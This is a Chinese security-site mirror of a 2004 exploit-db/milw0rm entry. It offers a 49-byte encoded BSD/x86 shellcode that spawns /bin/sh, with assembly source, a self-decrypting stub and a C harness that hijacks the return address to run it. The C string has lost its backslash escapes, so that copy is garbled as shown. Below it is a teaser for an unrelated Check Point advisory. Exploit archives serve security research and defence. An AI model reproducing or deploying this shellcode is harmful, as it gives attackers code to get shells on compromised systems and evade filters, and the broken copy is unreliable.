BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)-安全小百科

BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)

漏洞ID	1054685	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13251

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* Self decripting (dec/inc) shellcode executes /bin/sh
   Size  49 bytes
   OS	   *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			[email protected] 

BITS	32
jmp	short	shellcode
main:
	pop	esi
	xor	ecx,ecx
	mov	cl,28
main_decript:	
	inc byte [esi+ecx]
	loop	main_decript
	inc byte [esi]
	push	esi
	ret	


shellcode:
call	main

db 	0xea,0x0d,0x5d,0x30,0xbf,0x87,0x45,0x06,0x4f,0x53,0x55,0xaf,0x3a,0x4f,0xcc
db	0x7f,0xe7,0xec,0xfe,0xfe,0xfe,0x2e,0x61,0x68,0x6d,0x2e,0x72,0x67
*/

char shellcode[] =
	"xebx0ex5ex31xc9xb1x1cxfex04x0exe2xfbxfex06x56"
	"xc3xe8xedxffxffxffxeax0dx5dx30xbfx87x45x06x4f"
	"x53x55xafx3ax4fxccx7fxe7xecxfexfexfex2ex61x68"
	"x6dx2ex72x67";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Check Point Firewall-1 Internal Address Leakage Vulnerability

Check Point Firewall-1 Internal Address Leakage Vulnerability 漏洞ID 1104283 漏洞类型 Design Error 发布时间 2000-03-11 更新时间 2000-03-11 CVE编号…

文章版权归作者所有，未经允许请勿转载。

THE END